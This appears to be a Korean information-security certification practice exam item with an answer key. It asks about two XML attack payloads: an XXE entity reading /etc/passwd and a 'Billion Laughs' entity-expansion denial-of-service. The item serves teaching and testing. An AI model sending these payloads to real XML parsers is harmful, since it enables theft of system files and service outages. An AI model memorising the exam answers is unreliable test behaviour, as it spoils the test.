정보보안기사 복구 문제의 한계 안내
16회 A 선택하기
실무형 선택하기
14. 아래에서 설명하는 보안 취약점에 대해서 질문에 답하시오.
[코드 1]
<?xml version="1.0"?>
<!DOCTYPE foo
<!ELEMENT foo ANY
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo> &xxe ;</foo>
[코드 2]
<?xml version="1.0"?>
<!DOCTYPE lols
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
.....
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lols>&lol9;</lols>
(1) [코드 1]에 제시된 공격기법의 이름을 쓰시오. (2) [코드 1]의 공격기법의 원리와 취약점을 서술하시오. (3) [코드 2] 코드를 실행했을 때 그 결과에 대해서 설명하시오.

클릭하면 정답이 보입니다.
정답 확인 맞췄어요 O 틀렸어요 X
(1) XXE(XML eXternal Entity) 인젝션
(2) XML 문서 안에서 외부의 개체를 참조하게 되는데 이때 외부 개체에 삽입된 악의적인 코드가 실행되어 데이터 유출, 서비스 거부 공격 등을 수행할 수 있음
(3) 엔티티 참조를 반복하면서 메모리 고갈, 이로 인한 서비스 불가
위키 해설
클릭하면 보입니다.
XML_external_entity_attack
문제 풀이
클릭하면 보입니다.
관련 포럼글
자유 댓글

모든 문제들의 저작권은 원저작권자에게 있습니다. 본 사이트는 웹상에 공개되어 있는 문제만 모아서 보여드립니다. 저작권 안내

copyright 2024 뉴비티::새로운 CBT 시스템 - newbt.kr 제휴 문의